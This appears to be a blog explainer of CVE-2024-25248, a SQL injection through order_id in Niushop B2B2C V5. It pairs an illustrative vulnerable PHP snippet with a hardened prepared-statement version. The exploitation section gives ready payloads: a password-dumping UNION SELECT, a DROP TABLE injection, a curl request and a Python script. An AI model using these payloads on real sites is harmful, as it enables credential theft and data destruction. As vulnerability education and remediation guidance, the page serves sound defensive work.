Niushop B2B2C is a popular open-source e-commerce platform, especially in Chinese markets. In February 2024, a serious vulnerability—CVE-2024-25248—was found in Niushop V5. This issue is caused by an unsafe function called orderGoodsDelivery(), which makes it possible for hackers to run almost any SQL command they want by tampering with a single parameter: order_id. Let’s break down what that means, how dangerous it really is, and how attackers exploit it in the real world.

What’s CVE-2024-25248?

CVE-2024-25248 is a SQL Injection vulnerability. If you’re new to the term, SQL Injection is when an attacker puts special text into an application's input fields, tricking the app into running malicious database commands.

In this case:
The vulnerability affects the orderGoodsDelivery() function in Niushop B2B2C V5, specifically via the order_id parameter.

*Attackers don’t need to have an account or any special access*—they just need to reach the vulnerable endpoint and insert some clever text in the right place.

The orderGoodsDelivery() function may look like this (simplified):

public function orderGoodsDelivery() {
    // $db is the application's database handle (omitted from this simplified snippet)
    $order_id = $_GET['order_id'];
    // Vulnerable: the raw request value is concatenated straight into the SQL text
    $query = "SELECT * FROM orders WHERE order_id = $order_id";
    $result = $db->query($query);
    // ... more logic
}

Problem:
The $order_id variable is taken straight from user input and plugged into an SQL query with no checking or escaping. If you provide order_id=99999, it’ll fetch the order like normal.

But what if you send this instead?

order_id=99999 OR 1=1

Now the query becomes:

SELECT * FROM orders WHERE order_id = 99999 OR 1=1

This always returns all rows because 1=1 is always true!

Attackers can go further, adding more dangerous commands. For example:

order_id=; DROP TABLE users; --

So the executed query becomes:

SELECT * FROM orders WHERE order_id = ; DROP TABLE users; --

If the database connection allows several statements in a single query (stacked queries), this could delete the entire user table!
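For contrast, here is a hardened counterpart to the simplified function above. This is an added example, not code from the Niushop project; it assumes a PDO connection is injected into the controller and reuses the table and column names from the simplified snippet.

```php
<?php
// Hardened counterpart to the simplified orderGoodsDelivery() above.
// Added example, not Niushop code. Assumes a PDO connection is injected
// and that the table/column names match the simplified snippet.
class OrderController
{
    private PDO $pdo;

    public function __construct(PDO $pdo)
    {
        // Use real server-side prepared statements, not client-side emulation,
        // so the SQL text and the bound values travel to MySQL separately.
        $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
        $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        $this->pdo = $pdo;
    }

    public function orderGoodsDelivery(): ?array
    {
        // 1. Validate: order_id must be a positive integer. Anything else,
        //    such as "99999 OR 1=1" or "; DROP TABLE users; --", is rejected
        //    before it gets anywhere near the database.
        $order_id = filter_var(
            $_GET['order_id'] ?? '',
            FILTER_VALIDATE_INT,
            ['options' => ['min_range' => 1]]
        );
        if ($order_id === false) {
            http_response_code(400);
            return null;
        }

        // 2. Parameterise: the value is bound, never concatenated, so the
        //    SQL the server parses is fixed regardless of what the client sent.
        $stmt = $this->pdo->prepare(
            'SELECT * FROM orders WHERE order_id = :order_id'
        );
        $stmt->bindValue(':order_id', $order_id, PDO::PARAM_INT);
        $stmt->execute();

        $order = $stmt->fetch(PDO::FETCH_ASSOC);
        // ... more logic
        return $order === false ? null : $order;
    }
}
```

Either defence alone would stop the payloads shown on this page; together they also give you a clean 400 response to alert on when someone probes the parameter.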

Exploiting CVE-2024-25248: Step-By-Step

Step 1: Find the vulnerable endpoint.

Usually something like:

http://[target-site]/index.php?c=order&a=orderGoodsDelivery&order_id=[payload]

Step 2: Craft a malicious order_id value, like:

1 OR 1=1

Or to dump sensitive info (example for MySQL):

1 UNION SELECT user(),password,3,4 FROM niushop_user

Step 3: Send the request in a browser or with a tool like curl:

curl "http://victim-site.com/index.php?c=order&a=orderGoodsDelivery&order_id=1%20OR%201=1"

Step 4: Look for dumped data, errors, or signs that the site is leaking info.

Here’s a Python script demonstrating a UNION-based attack:

import requests

url = "http://victim-site.com/index.php"
payload = "1 UNION SELECT user(),password FROM niushop_user"

params = {
    "c": "order",
    "a": "orderGoodsDelivery",
    "order_id": payload
}

response = requests.get(url, params=params)
print(response.text)

References

- CVE-2024-25248 on NIST
- GitHub issue discussing the Niushop V5 vulnerability
- Niushop official site
- OWASP SQL Injection Overview

Final Thoughts

*SQL Injection bugs like CVE-2024-25248 are among the oldest but still the most dangerous web app weaknesses.* If you use Niushop, update today—and if you write PHP code, never build SQL queries by putting variables directly into your SQL!

Stay safe—don’t let your site become another easy target.

Timeline

Published on: 02/26/2024 22:15:07 UTC
Last modified on: 02/14/2025 16:22:09 UTC